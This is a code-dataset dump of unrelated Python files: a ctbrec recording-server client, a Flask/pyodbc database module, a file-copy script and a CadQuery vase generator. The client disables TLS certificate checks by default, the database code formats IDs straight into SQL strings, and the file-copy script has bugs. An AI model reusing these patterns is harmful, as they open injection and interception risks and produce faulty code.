!!!!\n###################################################################################\n\nCTBREC server functionality that is exposed includes:\n* querying server state\n* updating server settings\n* getting/adding/modifying/deleting models\n* getting/adding/modifying/deleting model-groups\n* getting/deleting/post-processing recordings\n\nTested with ctbrec-server version 4.7.4, and Python version 3.9\n\"\"\"\n\nimport json\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Union, Mapping, Optional\nimport uuid\nimport re\nimport hmac\nimport hashlib\nimport warnings\n\nfrom urllib3.exceptions import InsecureRequestWarning\nimport requests\n\n\nclass CtbRecRequestFailed(Exception):\n \"\"\" Exception to be raised if ctbrec server returns status=='fail' \"\"\"\n pass\n\n\nclass CtbRecInvalidModelDefinition(Exception):\n \"\"\" Exception to be raised model definition doesn't conform to recognised pattern \"\"\"\n pass\n\n\nclass CtbRecNotFound(Exception):\n \"\"\" Exception to be raised if an attempt to match a model or group on the server fails \"\"\"\n pass\n\n\nclass CtbRecAlreadyExists(Exception):\n \"\"\" Exception to be raised if an attempt is made to create a model-group that already exists\"\"\"\n pass\n\n\nclass CtbRec:\n \"\"\"\n Simple Python interface to the awesome ctbrec-server\n \"\"\"\n\n # basic regular expressions for model strings/urls\n regex = {\n 'url': re.compile('https?://'),\n 'site_name': re.compile(r'[A-Z]\\w+:[\\w-]+'),\n 'domain_name': re.compile(r'https?://([\\w-]+\\.)*([\\w-]+\\.[\\w-]+)/([\\w-]+/)*(.*)/?$'),\n 'model_type': re.compile(r'ctbrec\\.sites\\.[\\w]+\\.([\\w]+)Model')\n }\n\n class ModelType(Enum):\n \"\"\" used for identifying model input type \"\"\"\n url = 1\n site_name = 2\n model_dict = 3\n\n def __init__(self, server_url: str, username: str = None, password: str = None, verify: Union[bool, str] = False):\n \"\"\"\n Initialise server connection\n\n Args:\n server_url: url of the ctbrec server, eg https://localhost:8443\n username: optional ctbrec server username Default is None\n password: optional ctbrec server password Default is None\n verify: Passed through to requests.Session for server ssl certificate handling. Default is False.\n \"\"\"\n # ignore insecure request warnings when tls is being used\n warnings.simplefilter(action='ignore', category=InsecureRequestWarning)\n # initialise connection parameters\n self.server_url = server_url.strip(\"/\")\n self.session = requests.Session()\n if username is not None or password is not None:\n self.session.auth = (username, password)\n self.session.verify = verify\n self.session.headers.update({'X-Requested-With': 'XMLHttpRequest'})\n # get hmac key\n hmac_req = self.session.get(self.server_url+'/secured/hmac')\n if hmac_req.status_code == 200 and len(hmac_req.text) > 0:\n self.hmac_key = json.loads(hmac_req.text)['hmac'].encode('utf-8')\n else:\n self.hmac_key = b''\n # keep copy of initial server config\n self.initial_config = self.get_settings()\n self.initial_models = self.get_models()\n self.initial_model_groups = self.get_model_groups()\n\n # ----------------------------------------- model methods ---------------------------------------------------------\n def get_models(self, online: bool = False) -> Mapping[str, dict]:\n \"\"\"\n Get a list of all models on the server\n\n Args:\n online: if True then only retrieve online models else return all models. 
Default is False.\n Returns:\n dict of models where key is Site:ModelName\n Raises:\n CtbRecRequestFailed\n \"\"\"\n ml = self.send_request(url='/rec', data={'action': 'listOnline' if online else 'list'})['models']\n return {self.model_id(m): m for m in ml}\n\n def get_model_status(self) -> Mapping[str, str]:\n \"\"\"\n Get status code for all models\n\n Returns: dict with status for each Site:Model. Status can be one of\n [\"recording\", \"online\", \"offline\", \"paused\", \"later\"]\n Raises:\n CtbRecRequestFailed\n \"\"\"\n m = self.get_models()\n o = self.get_models(online=True)\n r = self.get_recordings()\n result = dict.fromkeys(m.keys(), 'offline')\n result.update(dict.fromkeys(o.keys(), 'online'))\n result.update(dict.fromkeys({self.model_id(i['model']) for i in r if i['status'] == 'RECORDING'}, 'recording'))\n result.update(dict.fromkeys({k for k, v in m.items() if v['markedForLater']}, 'later'))\n result.update(dict.fromkeys({k for k, v in m.items() if v['suspended']}, 'paused'))\n return result\n\n def add_model(self, model: Union[str, dict], props: dict = None) -> dict:\n \"\"\"\n Add a model to the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n props: optional dict of one or more model definition items to update in model. These can include;\n 'priority' (integer), 'markedForLater' (True|False), 'suspended' (True|False),\n 'recordUntil' (int), 'recordUntilSubsequentAction' (string).\n Returns:\n The model dict if successfully added\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n if props:\n props = self.parse_model_props(props)\n\n # determine model specification type\n mt = self.parse_model_type(model)\n if mt == self.ModelType.model_dict:\n model = self.parse_model_props(model)\n if props:\n model.update(props)\n data = {'action': 'start', 'model': model}\n elif mt == self.ModelType.site_name:\n data = {'action': 'startByName', 'model': {\"type\": None, \"name\": \"\", \"url\": model}}\n elif mt == self.ModelType.url:\n data = {'action': 'startByUrl', 'model': {\"type\": None, \"name\": \"\", \"url\": model}}\n else:\n data = {} # should never reach here because parse_model_type will raise an exception\n # query the server\n self.send_request(\"/rec\", data=data)\n # retrieve model back from server\n m = self.find_model(model)\n # update model dict with optional additional properties\n if props and mt != self.ModelType.model_dict:\n m = self.update_model(m, props)\n return m\n\n def add_models(self, models: list[Union[str, dict]], props: dict = None) -> list:\n \"\"\"\n suspended=False, later=False, stop_action = 'PAUSE',\n\n Add a list of models to the server, catching any exceptions\n\n Args:\n models: a list of model definitions - one of [url[str], Site:Name[str], ModelDict[dict]]\n props: optional dict of one or more model definition items that will be applied to all models.\n These can include;\n 'priority' (int), 'markedForLater' (bool), 'suspended' (bool),\n 'recordUntil' (int|datetime), 'recordUntilSubsequentAction' (str).\n Returns:\n A list of any models successfully added\n \"\"\"\n models_added = []\n for m in models:\n try:\n models_added.append(self.add_model(m, props))\n except (CtbRecRequestFailed, CtbRecInvalidModelDefinition) as error:\n warnings.warn(f'Unable to add {m} to server: {error}')\n except CtbRecNotFound:\n warnings.warn(f'{m} added but could not be matched on server')\n return models_added\n\n def update_model(self, model: Union[str, dict], props: dict) -> dict:\n \"\"\" 
Update properties for an existing model on the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n props: dict of one or more model definition items to update in model. These can include;\n 'priority' (int), 'markedForLater' (bool), 'suspended' (bool),\n 'recordUntil' (int|datetime), 'recordUntilSubsequentAction' (str).\n Returns:\n The updated model dict\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n props = self.parse_model_props(props)\n mt = self.parse_model_type(model)\n m = model if mt == self.ModelType.model_dict else self.find_model(model)\n invalid_keys = [k for k in props if k not in m]\n if invalid_keys:\n warnings.warn(f'Invalid properties {\",\".join(invalid_keys)} will be ignored.')\n p = {k: v for k, v in props.items() if k in m}\n if m and p:\n m.update(p)\n self.send_request(\"/rec\", data={\"action\": \"start\", \"model\": m})\n return self.find_model(m)\n warnings.warn(\"Failed to update model properties\")\n return dict()\n\n def remove_model(self, model: Union[str, dict]):\n \"\"\" Delete a model from recording list on the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={\"action\": \"stop\", \"model\": self.find_model(model)})\n\n def remove_models(self, models: list[Union[str, dict]]) -> list[Union[str, dict]]:\n \"\"\" Delete a list of models from the server, catching any exceptions\n\n Args:\n models: list of models where elements must be one of [url[str], Site:Name[str], ModelDict[dict]]\n Returns:\n a list of any input models that failed to be removed\n \"\"\"\n failed = []\n for m in models:\n try:\n self.remove_model(m)\n except (CtbRecRequestFailed, CtbRecInvalidModelDefinition, CtbRecNotFound) as error:\n failed.append(m)\n warnings.warn(f'Unable to remove {m} from server: {error}')\n return failed\n\n def find_model(self, model: Union[str, dict]) -> dict:\n \"\"\" get an existing model on the server by matching model input\n\n Args:\n model: string|dict - a ctbrec model definition\n Returns:\n model dict if model found on server\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n models = self.get_models()\n mt = self.parse_model_type(model)\n if mt == self.ModelType.model_dict:\n match = [m for m in models.values() if m['type'] == model['type'] and m['name'] == model['name']]\n elif mt == self.ModelType.url:\n match = [m for m in models.values() if self.url_match(m['url'], model)]\n elif mt == self.ModelType.site_name and model in models:\n match = [models[model]]\n else:\n match = []\n if match:\n return match[0]\n raise CtbRecNotFound(\"Requested model could not be found on server.\")\n\n # ----------------------------------------- model group methods ----------------------------------------------------\n def get_model_groups(self) -> Mapping[str, dict]:\n \"\"\"\n Get a dict of all model groups currently on the server\n\n Returns:\n dict keyed by group-name, containing all model group dicts on the server. 
Model groups contain keys\n            [\"name\", \"modelUrls\", \"id\"]\n        \"\"\"\n        g = self.send_request(url='/rec', data={'action': 'listModelGroups'})['groups']\n        return {v['name']: v for v in g}\n\n    def delete_model_group(self, group: Union[dict, str]):\n        \"\"\"\n        Delete a model group from the server\n\n        Args:\n            group: a group dict, or group name identifying the group to be deleted\n        Raises:\n            CtbRecNotFound\n            CtbRecRequestFailed\n        \"\"\"\n        if isinstance(group, str):\n            g = self.find_model_group(group)\n        else:\n            g = group\n        self.send_request(url='/rec', data={'action': 'deleteModelGroup', 'modelGroup': g})\n\n    def save_model_group(self, group: dict):\n        \"\"\"\n        Save a model group to the server. This will overwrite any existing information in the group.\n\n        Args:\n            group: the group dict to be saved\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'saveModelGroup', 'modelGroup': group})\n\n    def add_models_to_group(self, group: Union[dict, str], model_list: list[Union[dict, str]]) -> dict:\n        \"\"\"\n        Add models to an existing model group.\n\n        Args:\n            group: either a group name or a group dict, specifying an existing model group that is to be updated.\n            model_list: a list of models where list items can be either an url string, or a model dict.\n        Returns:\n            The updated model group retrieved back from the server\n        Raises:\n            CtbRecNotFound\n            CtbRecRequestFailed\n        \"\"\"\n        if isinstance(group, str):\n            group = self.find_model_group(group)\n        ml = {m if isinstance(m, str) else m['url'] for m in model_list}\n        group['modelUrls'].extend(list(ml))\n        self.save_model_group(group)\n        return self.get_model_groups()[group['name']]\n\n    def remove_models_from_group(self, group: Union[dict, str], model_list: list[Union[dict, str]]):\n        \"\"\"\n        Remove models from an existing model group.\n\n        Args:\n            group: either a group name or a group dict, specifying an existing model group that is to be updated.\n            model_list: a list of models where list items can be either an url string, or a model dict.\n        Returns:\n            The updated model group retrieved back from the server\n        Raises:\n            CtbRecNotFound\n            CtbRecRequestFailed\n        \"\"\"\n        if isinstance(group, str):\n            group = self.find_model_group(group)\n        ml = {m if isinstance(m, str) else m['url'] for m in model_list}\n        group['modelUrls'] = [m for m in group['modelUrls'] if m not in ml]\n        self.save_model_group(group)\n        return self.get_model_groups()[group['name']]\n\n    def create_model_group(self, name: str, model_list: list) -> dict:\n        \"\"\"\n        Create a new model group on the server\n
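\n        Example (sketch; 'client' is a CtbRec instance and the URL is a placeholder)::\n\n            group = client.create_model_group('favourites', ['https://example.com/somemodel/'])\n\n        Args:\n            name: a string specifying name of the new group. 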
Must be unique.\n            model_list: a list of models where list items can be either an url string, or a model dict\n        Returns:\n            The newly created model-group dict retrieved back from the server\n        Raises:\n            CtbRecAlreadyExists\n            CtbRecRequestFailed\n            CtbRecNotFound\n        \"\"\"\n        groups = self.get_model_groups()\n        if name in groups:\n            raise CtbRecAlreadyExists(f'Model group {name} already exists')\n        ml = {m if isinstance(m, str) else m['url'] for m in model_list} # use set to reduce to unique urls\n        self.save_model_group({\"name\": name, 'modelUrls': list(ml), 'id': uuid.uuid4().__str__()})\n        return self.get_model_groups()[name]\n\n    def find_model_group(self, name: str) -> dict:\n        \"\"\"\n        Retrieve an existing model group from the server by name\n\n        Args:\n            name: a string specifying the name of the group to look up.\n        Returns:\n            Model-group dict\n        Raises:\n            CtbRecNotFound\n            CtbRecRequestFailed\n        \"\"\"\n        groups = self.get_model_groups()\n        if name in groups:\n            return groups[name]\n        raise CtbRecNotFound(f'Model group {name} could not be found on the server')\n    \n    # --------------------------------------- recording methods -------------------------------------------------------\n    def get_recordings(self) -> list[dict]:\n        \"\"\"\n        Get a list of all recordings from the server\n\n        Returns:\n            list of recording dicts\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        return self.send_request(url='/rec', data={'action': 'recordings'})['recordings']\n\n    def delete_recording(self, recording: dict):\n        \"\"\"\n        **Permanently** delete a recording on server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'delete', 'recording': recording})\n\n    def pin_recording(self, recording: dict):\n        \"\"\"\n        Pin a recording on the server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'pin', 'recording': recording})\n\n    def unpin_recording(self, recording: dict):\n        \"\"\"\n        Unpin a recording on the server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'unpin', 'recording': recording})\n\n    def annotate_recording(self, recording: dict, note: str):\n        \"\"\"\n        Add a note to a recording on the server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        recording['note'] = note\n        self.send_request(url='/rec', data={'action': 'setNote', 'recording': recording})\n\n    def rerun_post_process(self, recording: dict):\n        \"\"\"\n        Rerun post-processing for a recording\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'rerunPostProcessing', 'recording': recording})\n\n    # --------------------------------------- general server methods ---------------------------------------------------\n    def get_settings(self) -> list:\n        \"\"\" Get current server settings\n\n        Returns:\n            list of current server settings\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        return self.send_request(url='/config')\n\n    def update_settings(self, settings: Union[dict, list]) -> list:\n        \"\"\" Update server config settings\n\n        Args:\n            settings: either a dict of key-value pairs where keys must be valid ctbrec setting keys and values must\n                conform to expected type, or a list of ctbrec settings.\n        Returns:\n            list of server settings after updates have been applied\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        if isinstance(settings, dict):\n            data = {s['key']: s for s in self.get_settings()}\n            for k in settings:\n                if k not in data.keys():\n                    warnings.warn(f'{k} is not a valid settings key and will be ignored')\n                    continue\n                data[k]['value'] = settings[k]\n            
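# convert the dict of settings back into the list form the /config endpoint expects\n            data = 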
list(data.values())\n        else:\n            data = settings\n        self.send_request(url='/config', data=data)\n        return self.get_settings()\n\n    def get_space(self) -> dict:\n        \"\"\" Get drive space statistics from server\n\n        Returns:\n            dict of drive space statistics\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        return self.send_request(url='/rec', data={'action': 'space'})\n\n    def get_summary(self) -> dict:\n        \"\"\" Get summary of server activity\n\n        Returns:\n            dict summarising model, recording and disk-space activity on the server\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        models = self.get_models()\n        paused = len([m for m in models.values() if m['suspended']])\n        later = len([m for m in models.values() if m['markedForLater']])\n        online = len(self.get_models(online=True))\n        recordings = self.get_recordings()\n        recording = len([r for r in recordings if r['status'] == 'RECORDING'])\n        post_process = len([r for r in recordings if r['status'] == 'POST_PROCESSING'])\n        space = self.get_space()\n        return {\"total_models\": len(models), \"models_recording\": recording, \"models_online\": online,\n                \"models_paused\": paused, \"models_marked_later\": later, \"total_recordings\": len(recordings),\n                \"post_processing\": post_process,\n                \"space_used\": f\"{round((space['spaceTotal']-space['spaceFree'])/1e9,3)} GB\",\n                \"space_free\": f\"{round(space['spaceFree']/1e9,3)} GB\"}\n\n    def pause_recording(self):\n        \"\"\" Suspend all recording on the server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'pauseRecorder'})\n\n    def resume_recording(self):\n        \"\"\" Resume all recording on the server\n\n        Raises:\n            CtbRecRequestFailed\n        \"\"\"\n        self.send_request(url='/rec', data={'action': 'resumeRecorder'})\n\n\n    # ------------------------------------------- internal methods -----------------------------------------------------\n    def type_to_site(self, model_type: str) -> str:\n        \"\"\"\n        Get ctbrec site code from ctbrec site class name\n\n        Args:\n            model_type: str containing ctbrec model type code\n        \"\"\"\n        return re.findall(self.regex['model_type'], model_type)[0]\n\n    def parse_model_props(self, props: dict) -> dict:\n        \"\"\"\n        Process model properties. At the moment this only adjusts 'recordUntil' if it is specified as a datetime or\n        in hours.\n\n        Args:\n            props: dict containing model properties\n        Returns:\n            model dict after converting recordUntil to a timestamp\n        \"\"\"\n        p = props\n        if p and 'recordUntil' in p:\n            record_until = p['recordUntil']\n            if isinstance(record_until, datetime):\n                p['recordUntil'] = round(record_until.timestamp()*1000)\n            elif isinstance(record_until, int) and record_until < 10000: # assume it is specified in hours\n                p['recordUntil'] = round(datetime.now().timestamp()*1000 + record_until*3600000)\n        return p\n\n    
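# e.g. parse_model_props({'recordUntil': 8}) converts 8 (hours) into an epoch-millisecond timestamp about 8h from now\n    def model_id(self, model: dict) -> str:\n        \"\"\"\n        Get model id from model dict. 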
Id is Site:ModelName\n\n Args:\n model: ctbrec model dict\n \"\"\"\n return re.findall(self.regex['model_type'], model['type'])[0] + ':' + model['name']\n\n def url_match(self, url1: str, url2: str) -> bool:\n \"\"\" Check if two urls match, either exact match or by top level domain and name\n\n This makes the assumption that model name is the last string in the url, which seems to be the case at the\n moment, may not always be true in the future\n \"\"\"\n u1 = url1.strip().rstrip('/')\n u2 = url2.strip().rstrip('/')\n if u1 == u2:\n return True\n u1g = re.findall(self.regex['domain_name'], u1)[0]\n u2g = re.findall(self.regex['domain_name'], u2)[0]\n return u1g[1] == u2g[1] and u1g[3] == u2g[3]\n\n def parse_model_type(self, model: Union[str, dict]) -> ModelType:\n \"\"\" Determine model request type from model input \"\"\"\n if isinstance(model, dict) and all(k in model for k in ['type', 'name', 'url']):\n return self.ModelType.model_dict\n elif isinstance(model, str) and re.match(self.regex['url'], model):\n return self.ModelType.url\n elif isinstance(model, str) and re.match(self.regex['site_name'], model):\n return self.ModelType.site_name\n raise CtbRecInvalidModelDefinition(\"Model must be one of [url[str], Site:Name[str], ModelDict[dict]]\")\n\n def send_request(self, url: str, data: Optional[Union[dict, list]] = None) -> Union[dict, list]:\n \"\"\" Send a request to the ctbrec server\n\n Args:\n url: string - relative url for the request, eg. '/rec'\n data: dict - payload to send to server. If None then GET will be used rather than POST\n Return:\n server result data structure\n Raises:\n CtbRecRequestFailed\n \"\"\"\n data_str = '' if data is None else json.dumps(data)\n data_hmac = hmac.new(self.hmac_key, data_str.encode('utf-8'), hashlib.sha256).hexdigest()\n self.session.headers.update({'CTBREC-HMAC': data_hmac})\n if data is None:\n result = self.session.get(self.server_url + url)\n else:\n result = self.session.post(self.server_url+url, data=data_str)\n if result.status_code == 200:\n result_json = json.loads(result.text)\n if isinstance(result_json, dict) and result_json['status'] != \"success\":\n raise CtbRecRequestFailed(f\"Request failed: {result_json['msg']}\")\n else:\n return result_json\n else:\n raise CtbRecRequestFailed(f'HTTP error: {result.status_code} : {result.reason} : {result.text}')\n","repo_name":"Jafea7/ctbrec-debian","sub_path":"rootfs/app/ctbrec.py","file_name":"ctbrec.py","file_ext":"py","file_size_in_byte":24982,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"2374604254","text":"\"\"\"\ndatabase functionality\n\"\"\"\n\n# Python Core Imports\nimport datetime\nimport pandas as pd\n\n# Third Party Imports\nimport pyodbc\nfrom flask import g, current_app as app\n\n# Application Imports\nfrom utils import label_sentences\n\n\ndef create_connection():\n connection = pyodbc.connect(Driver= app.config['DATABASE_DRIVER'], Server= app.config['DATABASE_HOST'], Database= app.config['DATABASE_NAME'], uid= app.config['UID'], pwd= app.config['PWD'])\n return connection\n\n\ndef get_db():\n if 'db' not in g:\n g.db = create_connection()\n\n return g.db\n\n\ndef file_order_info(file_Order_Id):\n \"\"\"\n returns file order info for given file order id\n \"\"\"\n conn = get_db()\n customer_id, customer_order_id, file_name = None, None, None\n query = 'EXEC [dbo].[SP_GetFileOrder] @FileOrderID = {0}'.format(file_Order_Id)\n file_order = pd.read_sql(query, conn)\n if not file_order.empty:\n customer_id, 
customer_order_id, file_name = str(file_order.CustomerID.values[0]), str(file_order.CustomerOrderID.values[0]), str(file_order.FileName.values[0])\n return customer_id, customer_order_id, file_name\n\n\ndef file_page_text_info(file_order_id):\n \"\"\"\n returns file page text for given file order id\n \"\"\"\n conn = get_db()\n x_test, y_test, data = None, None, None\n query = 'EXEC [dbo].[GET_FilePageTextByOrderId] @FileOrderID = {0}'.format(file_order_id)\n dataset = pd.read_sql(query, conn)\n if not dataset.empty:\n x_test, y_test = dataset.PageText.values, dataset.DocumentIdentifierID.values\n data = label_sentences(x_test, y_test,'Test')\n return data, y_test\n\n\ndef client_document_names(customer_id):\n \"\"\"\n mapping for ML trained and document identifier ids and names dictionary for given client id\n \"\"\"\n conn = get_db()\n ml_docs_ids = None\n docs_names = None\n query = 'EXEC [dbo].[Get_MLSpecificDocumentsByClient] @CustomerID = {0}'.format(customer_id)\n dataset = pd.read_sql(query, conn)\n if not dataset.empty:\n ml_docs_ids = dataset.loc[:, ['MLDocumentID','DocumentIdentifierID']].set_index('MLDocumentID').to_dict()['DocumentIdentifierID']\n docs_names = dataset.loc[:, ['DocumentIdentifierID','DocumentName']].set_index('DocumentIdentifierID').to_dict()['DocumentName']\n return ml_docs_ids, docs_names\n\n\ndef insert_indexing_result(res, file_Order_Id):\n \"\"\"\n inserts resultant documents into indexing result\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n sql = \"INSERT INTO IndexingResult(FileOrderID, DocumentIdentifierID, DocumentName, PageFrom, PageTo, PageCount, Accuracy_Level) VALUES(?,?,?, ?,?,?,?)\"\n params = [(file_Order_Id, r.Document_Id, r.Document_Name, r.Page_From, r.Page_To, r.Page_Count, r.Accuracy,) for r\n in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef update_file_page_text_with_customer_order_id(res, file_Order_Id, customer_id, customer_order_id):\n \"\"\"\n updates file page text attributes for indexing results\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n\n sql = \"UPDATE FilePageText SET DocumentID = ?, DocumentName=?, CustomerID=?, CustomerOrderID=? Where FileOrderID = ? and PageNumber >= ? and PageNumber <= ?\"\n params = [[r.Document_Id, r.Document_Name, customer_id, customer_order_id, file_Order_Id, r.Page_From, r.Page_To]\n for r in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef update_file_page_text(res, file_Order_Id, customer_id):\n \"\"\"\n updates file page text attributes for indexing results\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n\n sql = \"UPDATE FilePageText SET DocumentID = ?, DocumentName=?, CustomerID=? Where FileOrderID = ? and PageNumber >= ? 
and PageNumber <= ?\"\n params = [[r.Document_Id, r.Document_Name, customer_id, file_Order_Id, r.Page_From, r.Page_To] for r in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef insert_into_logs(file_Order_Id, log_type, message):\n \"\"\"\n inserts file order log\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[SP_Logs_Insert] ?, ?, ?, ?, ?, ?'\n values = (file_Order_Id, datetime.datetime.now(), log_type, message, 0, 0)\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef update_indexed_document_counts_in_file_order(file_Order_Id, indexed_docs):\n \"\"\"\n count of indexed documets against file order id\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[Update_Indexed_Document_Counts] ?, ?'\n values = (file_Order_Id, indexed_docs)\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef insert_into_processed_order_logs(file_Order_Id, ml_model_time, total_indexing_time):\n \"\"\"\n insert ML model time and total indexing time by ML api\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[InsertModelAndIndexingTimeByML] ?, ?, ?'\n values = (file_Order_Id, \"{0:.2f}\".format(ml_model_time), \"{0:.2f}\".format(total_indexing_time))\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef delete_existing_file_Order_log(file_order_Id):\n \"\"\"\n deletes from file order log\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = \"DELETE FROM fileorderlog where FileOrderID = ?\"\n params = (file_order_Id,)\n crsr.execute(sql, params)\n cnxn.commit()\n\n\ndef insert_file_Order_log(file_Order_Id, order_log):\n \"\"\"\n inserts file order log\n \"\"\"\n delete_existing_file_Order_log(file_Order_Id)\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = \"INSERT INTO fileorderlog(FileOrderID, OrderLog) VALUES(?,?)\"\n params = (file_Order_Id, order_log,)\n crsr.execute(sql, params)\n cnxn.commit()\n","repo_name":"RizwanLiaqatButt/ML-Py","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73624233764","text":"import time\nimport os\nimport shutil\n\n\ndef check_path(input_file, output_path):\n '''\n Make sure input path exists\n and output path exsits, if not creat one\n '''\n try:\n # If input file exists\n if os.path.isfile(input_file):\n # If output path exists\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n return True, ''\n else:\n # If file exists in output check_path\n filename = os.path.basename(inputfile)\n output_file = os.path.join(output_path, filename)\n if os.path.exists(output_file):\n return False, 'ERROR:output file already exists !'\n\n else:\n return True, ''\n else:\n return False, 'ERROR:input file not exists !'\n\n except Exception as e:\n return False, e\n\n\ndef file_copy(input_file, output_path, size):\n '''\n 1kB = 1024B\n 1B = 8b\n '''\n start_time = time.time()\n with open(input_file, 'rb') as f:\n # Get size of file\n final_pos = f.seek(0, 2)\n\n pos = 0\n while pos < f.seek(0, 2):\n f.seek(pos,0)\n data = f.read(size)\n\n with open(output_path, 'ab') as fw:\n fw.write(data)\n # print(pos, data)\n pos += size\n\n end_time = time.time()\n run_time = end_time - start_time\n data = float('%.2f' % run_time)\n\n return True, data\n\n\ndef file_transfer(input_file, output_path):\n\n # Copy file\n filename = os.path.basename(input_file)\n output_file = os.path.join(output_path,filename)\n if not os.path.exists(output_file):\n shutil.copyfile(input_file, 
output_file)\n print('finish')\n\n\nif __name__ == '__main__':\n inputfile = r'D:\\Cedric\\TD\\Tools\\file_transfer\\Test\\test.mp4'\n outputpath = r'D:\\Cedric\\TD\\Tools\\file_transfer\\Test'\n size = 46593\n\n print(check_path(inputfile, outputpath))\n # file_transfer(inputfile,outputpath)\n\n # print (file_copy(inputfile, outputpath, size))\n print ()\n","repo_name":"CedricMx/Tools","sub_path":"file_transfer/file_transfer.py","file_name":"file_transfer.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70218585446","text":"# Scipy 1.6 or later is required.\n# not stable, float-error problems? \n# Keep on trying until you make it ... XD\n\nfrom random import random\nimport numpy\nfrom scipy import spatial\nfrom cadquery import Vector\nfrom cqmore import Workplane\nfrom cqmore.matrix import translation, scaling\nfrom cqmore.polygon import regularPolygon\nfrom cqmore.polyhedron import sweep\n\ndiameter = 90\nsides = 12\nheight = 120\nthickness = 2\nstep = 30\n\ndef voronoi_vase(diameter, sides, height, thickness, step):\n def sided_vase(diameter, sides, height):\n r = diameter / 2\n\n half_height = height / 2\n radii = [r * 0.5, r * 0.8, r, r * 0.875, r * 0.725, r * 0.625, r * 0.6, r * 0.75]\n h_step = height / len(radii)\n sections = []\n for i in range(len(radii)):\n polygon = regularPolygon(sides, radii[i])\n sections.append([(p[0], p[1], -half_height + h_step * i) for p in polygon])\n \n return Workplane().polyhedron(*sweep(sections))\n\n def random_points(diameter, height, step):\n random_scale = step / 2\n double_step = step * 2\n half_random_scale = random_scale / 2\n x_offset = -diameter / 2 - half_random_scale\n y_offset = -diameter / 2 - half_random_scale\n z_offset = -height / 2 - half_random_scale\n\n points = []\n for x in range(-double_step, diameter + double_step, step):\n for y in range(-double_step, diameter + double_step, step):\n for z in range(-double_step, height + double_step, step):\n points.append([\n x_offset + x + random() * random_scale, \n y_offset + y + random() * random_scale, \n z_offset + z + random() * random_scale]\n )\n return points\n \n def voronoiConvexs(diameter, height, thickness, step):\n voronoi = spatial.Voronoi(random_points(diameter, height, step))\n vertices = numpy.around(voronoi.vertices, 5)\n\n s = (step - thickness) / step\n m_scaling = scaling((s, s, s))\n\n convex = Workplane()\n convexs = Workplane()\n for region_i in voronoi.point_region:\n region = voronoi.regions[region_i]\n region_vts = [Vector(*vertices[i]) for i in region if i != -1]\n geom_center = sum(region_vts, Vector()) / len(region_vts)\n m = translation(geom_center.toTuple()) @ m_scaling @ translation((-geom_center).toTuple())\n transformed = m.transformAll(v.toTuple() for v in region_vts)\n convexs.add(convex.hull(transformed))\n\n return convexs\n\n vase = sided_vase(diameter, sides, height)\n\n outerShell = vase.faces('+Z').shell(thickness)\n innerShell = vase.faces('+Z').shell(-thickness)\n \n return (outerShell\n .intersect(voronoiConvexs(diameter, height, thickness, step))\n .union(innerShell)\n )\n \nvase = voronoi_vase(diameter, sides, height, thickness, step)\n","repo_name":"JustinSDK/cqMore","sub_path":"examples/voronoi_vase.py","file_name":"voronoi_vase.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"52"} +{"seq_id":"5932887841","text":"###!/usr/bin/env python3\n### 
